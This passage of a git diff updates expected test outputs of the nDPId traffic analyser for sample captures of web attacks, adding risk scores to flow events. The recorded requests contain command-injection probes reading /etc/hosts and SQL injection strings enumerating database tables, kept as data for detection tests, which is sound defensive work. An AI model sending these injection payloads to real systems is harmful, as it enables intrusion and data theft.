{"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}}
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="}
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}}
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -3196,10 +3196,10 @@
 ~~ total active/idle flows...: 797/797
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5662994 bytes
-~~ total memory freed........: 5662994 bytes
-~~ total allocations/frees...: 105038/105038
+~~ total memory allocated....: 5486859 bytes
+~~ total memory freed........: 5486859 bytes
+~~ total allocations/frees...: 106628/106628
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 1256 chars
-~~ json string avg len.......: 782 chars
+~~ json string max len.......: 1396 chars
+~~ json string avg len.......: 852 chars
diff --git a/test/results/WebattackSQLinj.pcap.out b/test/results/WebattackSQLinj.pcap.out
index 51c098c94..4c4b77c9f 100644
--- a/test/results/WebattackSQLinj.pcap.out
+++ b/test/results/WebattackSQLinj.pcap.out
@@ -3,56 +3,56 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"}
-00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00986{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"}
-00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"}
-00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"}
-00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
